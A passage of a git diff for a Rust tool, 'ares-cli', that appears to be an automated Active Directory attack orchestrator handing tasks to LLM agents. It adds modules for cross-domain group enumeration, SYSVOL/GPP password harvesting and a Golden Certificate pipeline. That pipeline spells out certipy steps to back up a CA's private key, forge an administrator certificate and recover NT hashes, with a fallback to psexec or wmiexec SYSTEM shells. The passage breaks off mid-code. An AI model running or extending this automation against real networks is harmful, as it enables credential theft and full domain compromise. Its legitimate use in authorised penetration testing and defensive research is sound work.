.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/foreign_group_enum.rs b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs new file mode 100644 index 00000000..02ab73be --- /dev/null +++ b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs @@ -0,0 +1,471 @@ +//! auto_foreign_group_enum -- enumerate cross-domain/cross-forest group memberships. +//! +//! Discovers foreign security principals (FSPs) — users/groups from one domain +//! that are members of groups in another domain. This reveals cross-forest and +//! cross-domain attack paths that BloodHound's intra-domain analysis might miss. +//! +//! Dispatches LDAP queries per trust relationship to find: +//! - Foreign users in local groups (e.g., FABRIKAM\jdoe in CONTOSO\TrustedAdmins) +//! - Foreign groups nested in local groups +//! - Domain Local groups with foreign members (the primary FSP container) + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect foreign group enumeration work items from current state. +/// +/// Pure logic extracted from `auto_foreign_group_enum` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_foreign_group_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() || state.domains.len() < 2 { + return Vec::new(); + } + + let mut items = Vec::new(); + + // For each domain, enumerate foreign security principals + for domain in &state.domains { + let dedup_key = format!("foreign_group:{domain}"); + if state.is_processed(DEDUP_FOREIGN_GROUP_ENUM, &dedup_key) { + continue; + } + + let dc_ip = match state.resolve_dc_ip(domain) { + Some(ip) => ip, + None => continue, + }; + + // Find a credential for this domain + let cred = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(ForeignGroupWork { + dedup_key, + domain: domain.clone(), + dc_ip, + credential: cred, + }); + } + + items +} + +/// Enumerate cross-domain foreign group memberships. +/// Interval: 45s. +pub async fn auto_foreign_group_enum( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("foreign_group_enum") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_foreign_group_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "foreign_group_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": [ + "(objectClass=foreignSecurityPrincipal)", + "(&(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=4))" + ], + "attributes": [ + "sAMAccountName", "member", "memberOf", "objectSid", + "groupType", "cn", "distinguishedName" + ], + "instructions": concat!( + "Enumerate Foreign Security Principals and cross-domain group memberships. ", + "1) Query CN=ForeignSecurityPrincipals,DC=... to list all foreign SIDs. ", + "2) Resolve each SID to its source domain user/group using ldapsearch against ", + "the source domain's DC. ", + "3) Query Domain Local groups (groupType bit 4) and check for foreign members. ", + "4) Report each cross-domain membership: source_domain\\source_user -> target_group ", + "(target_domain). These are critical for cross-forest attack paths. ", + "5) Register any discovered cross-domain memberships as vulnerabilities with ", + "vuln_type='foreign_group_membership', source=foreign_user, target=local_group, ", + "domain=target_domain, source_domain=foreign_domain.\n\n", + "IMPORTANT: For each user discovered during FSP enumeration, include them in the ", + "discovered_users array with EXACTLY this JSON format:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"foreign_group_enumeration\", \"memberOf\": [\"Group1\"]}\n", + "Include ALL users found — both foreign principals and local group members." + ), + }); + + let priority = dispatcher.effective_priority("foreign_group_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Foreign group enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_FOREIGN_GROUP_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_FOREIGN_GROUP_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Foreign group enum deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch foreign group enum"); + } + } + } + } +} + +struct ForeignGroupWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("foreign_group:{}", "contoso.local"); + assert_eq!(key, "foreign_group:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_FOREIGN_GROUP_ENUM, "foreign_group_enum"); + } + + #[test] + fn requires_multiple_domains() { + let domains: Vec = vec!["contoso.local".to_string()]; + assert!( + domains.len() < 2, + "Single domain should skip foreign group enum" + ); + } + + #[test] + fn two_domains_meets_requirement() { + let domains: Vec = vec!["contoso.local".to_string(), "fabrikam.local".to_string()]; + assert!(domains.len() >= 2); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "foreign_group_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "foreign_group_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = ForeignGroupWork { + dedup_key: "foreign_group:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_per_domain() { + let key1 = format!("foreign_group:{}", "contoso.local"); + let key2 = format!("foreign_group:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn foreign_security_principal_resolution() { + // The payload includes credential for cross-domain FSP resolution + let payload = json!({ + "technique": "foreign_group_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + // FSP resolution happens via the credential against the target domain + assert!(payload.get("credential").is_some()); + assert_eq!(payload["technique"], "foreign_group_enumeration"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_no_work() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_foreign_group_work(&state); + // Requires at least 2 domains + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_two_domains_with_creds() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed( + DEDUP_FOREIGN_GROUP_ENUM, + "foreign_group:contoso.local".into(), + ); + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_domain_without_dc() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + // Only contoso has a DC + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_quarantined_credential_falls_back() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_foreign_group_work(&state); + // Both domains should still get work (gooduser fallback for contoso) + assert_eq!(work.len(), 2); + // contoso should fall back to gooduser + let contoso_work = work.iter().find(|w| w.domain == "contoso.local").unwrap(); + assert_eq!(contoso_work.credential.username, "gooduser"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 2); + } +} diff --git a/ares-cli/src/orchestrator/automation/golden_cert.rs b/ares-cli/src/orchestrator/automation/golden_cert.rs new file mode 100644 index 00000000..c643cf49 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/golden_cert.rs @@ -0,0 +1,525 @@ +//! auto_golden_cert -- forge a Golden Certificate after owning an ADCS CA host. +//! +//! When a CA host is fully owned (local SYSTEM via lateral movement) and the +//! CA's domain is not yet dominated, drive the offline Golden Certificate +//! pipeline: +//! +//! 1. **Backup**: `certipy ca -backup` extracts the CA private key + cert +//! to a PFX (requires SYSTEM/local admin or CA admin rights — owning the +//! CA host satisfies this). +//! 2. **Forge**: `certipy forge -ca-pfx -upn administrator@` +//! produces a client-auth certificate signed by the CA, for any UPN. +//! No DC interaction is needed — purely offline. +//! 3. **Auth**: `certipy auth -pfx forged.pfx -dc-ip ` performs PKINIT +//! to obtain the target user's NT hash. +//! +//! This is the universal terminal for cross-forest compromise: every ADCS- +//! adjacent attack path (ESC1/ESC4/ESC8, MSSQL→xp_cmdshell→host, RBCD → +//! S4U → SYSTEM, shadow creds → admin → host) converges here once the CA +//! host is owned, regardless of which forest the CA lives in. +//! +//! Cross-forest note: the CA's *own* domain credential is what we need for +//! the `certipy ca -backup` RPC call. We pull it via `find_source_credential` +//! / `find_trust_credential` so a cred from the originating forest works +//! when there is no same-domain cred yet. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Watches for owned CA hosts and dispatches Golden Certificate pipelines. +/// Interval: 30s. +pub async fn auto_golden_cert(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("golden_cert") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_golden_cert_work(&state) + }; + + for item in work { + let mut payload = json!({ + "technique": "golden_cert", + "ca_host": item.ca_host, + "ca_hostname": item.ca_hostname, + "domain": item.domain, + "target_user": "administrator", + "target_upn": format!("administrator@{}", item.domain), + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "username": item.credential.username, + "password": item.credential.password, + "objectives": [ + "Step 1 (backup): run `certipy_ca` with backup=true, ca=, username/password from credential, dc_ip=. Requires SYSTEM or CA admin on the CA host — since this host is owned, you can also run a SYSTEM shell (psexec/wmiexec) and execute certipy locally.", + "Step 2 (forge): run `certipy_forge` with ca_pfx=, upn=`administrator@`. Output is a forged client-auth certificate signed by the CA private key — no DC interaction needed.", + "Step 3 (auth): run `certipy_auth` with pfx_path=, domain=, dc_ip= to PKINIT-authenticate as administrator and recover the NT hash.", + "If you don't yet know the CA name, run `certipy_find` first against this host to discover it (the CA's `Name` / `DNS Name`).", + "If `certipy_ca -backup` fails with an RPC/perm error from a network cred, fall back to a local SYSTEM shell (psexec/wmiexec to ca_host) and run certipy from there — the host is owned.", + ], + }); + + if let Some(ref dc) = item.dc_ip { + payload["dc_ip"] = json!(dc); + payload["target_ip"] = json!(dc); + } + if let Some(ref ca_name) = item.ca_name { + payload["ca_name"] = json!(ca_name); + } + if let Some(ref sid) = item.domain_sid { + payload["domain_sid"] = json!(sid); + payload["admin_sid"] = json!(format!("{sid}-500")); + } + + let priority = dispatcher.effective_priority("golden_cert"); + match dispatcher + .throttled_submit("exploit", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + ca_host = %item.ca_host, + domain = %item.domain, + "Golden Certificate pipeline dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GOLDEN_CERT, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GOLDEN_CERT, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(ca_host = %item.ca_host, "Golden Cert deferred by throttler"); + } + Err(e) => { + warn!(err = %e, ca_host = %item.ca_host, "Failed to dispatch Golden Cert"); + } + } + } + } +} + +/// Pure logic so it can be unit-tested without a `Dispatcher` or runtime. +fn collect_golden_cert_work(state: &StateInner) -> Vec { + state + .hosts + .iter() + .filter(|h| h.owned) + .filter_map(|h| { + let host_lower = h.ip.to_lowercase(); + let hostname_lower = h.hostname.to_lowercase(); + + let is_ca = state.shares.iter().any(|s| { + s.name.to_lowercase() == "certenroll" + && (s.host == h.ip || s.host.to_lowercase() == hostname_lower) + }); + if !is_ca { + return None; + } + + let domain = extract_domain_from_fqdn(&h.hostname).and_then(|d| { + if state.domains.iter().any(|known| known.to_lowercase() == d) { + Some(d) + } else { + state + .domains + .iter() + .find(|known| d.ends_with(&format!(".{}", known.to_lowercase()))) + .or_else(|| { + state + .domains + .iter() + .find(|known| known.to_lowercase().ends_with(&format!(".{d}"))) + }) + .cloned() + .or(Some(d)) + } + })?; + + // Don't forge a Golden Cert against a domain we already own. + if state.dominated_domains.contains(&domain) { + return None; + } + + let dedup_key = format!("{}:{}", host_lower, domain.to_lowercase()); + if state.is_processed(DEDUP_GOLDEN_CERT, &dedup_key) { + return None; + } + + // The certipy_ca call needs a credential that authenticates to the + // CA host's domain. Try same-domain first, then trusted-domain + // (cross-forest) as fallback. + let same_domain = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned(); + + let credential = same_domain.or_else(|| state.find_trust_credential(&domain))?; + + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); + + let ca_name = lookup_ca_name(state, &h.ip, &h.hostname); + + Some(GoldenCertWork { + ca_host: h.ip.clone(), + ca_hostname: h.hostname.clone(), + dedup_key, + domain, + dc_ip, + domain_sid, + ca_name, + credential, + }) + }) + .collect() +} + +/// Extract the domain portion of an FQDN ("ca01.contoso.local" -> "contoso.local"). +fn extract_domain_from_fqdn(fqdn: &str) -> Option { + fqdn.to_lowercase() + .split_once('.') + .map(|(_, d)| d.to_string()) +} + +/// Look up a CA name from previously-discovered ADCS vulns on this host. +/// Falls back to None if no `certipy_find` result has populated `ca_name` yet — +/// the LLM agent is instructed to run certipy_find first when this is missing. +fn lookup_ca_name(state: &StateInner, host_ip: &str, hostname: &str) -> Option { + let host_l = host_ip.to_lowercase(); + let hn_l = hostname.to_lowercase(); + state + .discovered_vulnerabilities + .values() + .filter(|v| { + let t = v.target.to_lowercase(); + t == host_l || t == hn_l + }) + .find_map(|v| { + for key in &["ca_name", "CA", "ca"] { + if let Some(s) = v.details.get(*key).and_then(|x| x.as_str()) { + if !s.is_empty() { + return Some(s.to_string()); + } + } + } + None + }) +} + +struct GoldenCertWork { + ca_host: String, + ca_hostname: String, + dedup_key: String, + domain: String, + dc_ip: Option, + domain_sid: Option, + ca_name: Option, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, owned: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned, + } + } + + fn make_share(host: &str, name: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: String::new(), + comment: String::new(), + } + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GOLDEN_CERT, "golden_cert"); + } + + #[test] + fn extract_domain_typical() { + assert_eq!( + extract_domain_from_fqdn("ca01.contoso.local"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn extract_domain_case_insensitive() { + assert_eq!( + extract_domain_from_fqdn("CA01.CONTOSO.LOCAL"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn extract_domain_bare_hostname() { + assert_eq!(extract_domain_from_fqdn("ca01"), None); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_unowned_ca_host_skipped() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!(work.is_empty(), "unowned CA host should not yield work"); + } + + #[test] + fn collect_owned_non_ca_host_skipped() { + let mut state = StateInner::new("test-op".into()); + // Owned host but no CertEnroll share + state + .hosts + .push(make_host("192.168.58.20", "fs01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!(work.is_empty(), "non-CA owned host should not yield work"); + } + + #[test] + fn collect_owned_ca_with_same_domain_cred_yields_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].ca_host, "192.168.58.50"); + assert_eq!(work[0].ca_hostname, "ca01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local"); + } + + #[test] + fn collect_dominated_domain_skipped() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state.dominated_domains.insert("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!( + work.is_empty(), + "should not forge against an already-dominated domain" + ); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_GOLDEN_CERT, "192.168.58.50:contoso.local".into()); + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + // No credentials at all + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_resolves_dc_ip_when_available() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip.as_deref(), Some("192.168.58.10")); + } + + #[test] + fn collect_certenroll_case_insensitive() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "certenroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_picks_domain_sid_when_known() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_sids + .insert("contoso.local".into(), "S-1-5-21-1111-2222-3333".into()); + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!( + work[0].domain_sid.as_deref(), + Some("S-1-5-21-1111-2222-3333") + ); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "CA01.CONTOSO.LOCAL", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + // Dedup key uses lowercase IP (already lowercase here) and lowercase domain + assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local"); + } + + #[test] + fn collect_multiple_owned_cas_yields_multiple_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state.shares.push(make_share("192.168.58.51", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state + .hosts + .push(make_host("192.168.58.51", "ca02.fabrikam.local", true)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass", "fabrikam.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 2); + } +} diff --git a/ares-cli/src/orchestrator/automation/golden_ticket.rs b/ares-cli/src/orchestrator/automation/golden_ticket.rs index d58b7372..3127cb0c 100644 --- a/ares-cli/src/orchestrator/automation/golden_ticket.rs +++ b/ares-cli/src/orchestrator/automation/golden_ticket.rs @@ -229,7 +229,7 @@ pub async fn auto_golden_ticket(dispatcher: Arc, mut shutdown: watch /// Uses the credential's own domain for NTLM auth (not the target domain) so /// cross-domain trust authentication works — e.g. a `child.contoso.local` /// cred can resolve the SID of `contoso.local` via its parent DC. -async fn resolve_domain_sid( +pub(crate) async fn resolve_domain_sid( _domain: &str, dc_ip: &str, password_cred: Option<&ares_core::models::Credential>, diff --git a/ares-cli/src/orchestrator/automation/gpp_sysvol.rs b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs new file mode 100644 index 00000000..a2d6d049 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs @@ -0,0 +1,342 @@ +//! auto_gpp_sysvol -- search for GPP passwords and credential artifacts in SYSVOL. +//! +//! Group Policy Preferences (GPP) XML files can contain encrypted passwords +//! using a publicly known AES key (MS14-025). SYSVOL scripts (.bat, .ps1, .vbs) +//! often contain hardcoded credentials. +//! +//! Dispatches two techniques per DC: +//! 1. `gpp_password_finder` — searches SYSVOL for Groups.xml, Scheduledtasks.xml, etc. +//! 2. `sysvol_script_search` — greps SYSVOL scripts for passwords/credentials + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect GPP/SYSVOL work items from state (pure logic, no async). +fn collect_gpp_sysvol_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("gpp:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_GPP_SYSVOL, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(GppSysvolWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Searches SYSVOL for GPP passwords and script credentials. +/// Interval: 45s. +pub async fn auto_gpp_sysvol(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("gpp_sysvol") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_gpp_sysvol_work(&state) + }; + + for item in work { + let payload = json!({ + "techniques": ["gpp_password_finder", "sysvol_script_search"], + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("gpp_sysvol"); + match 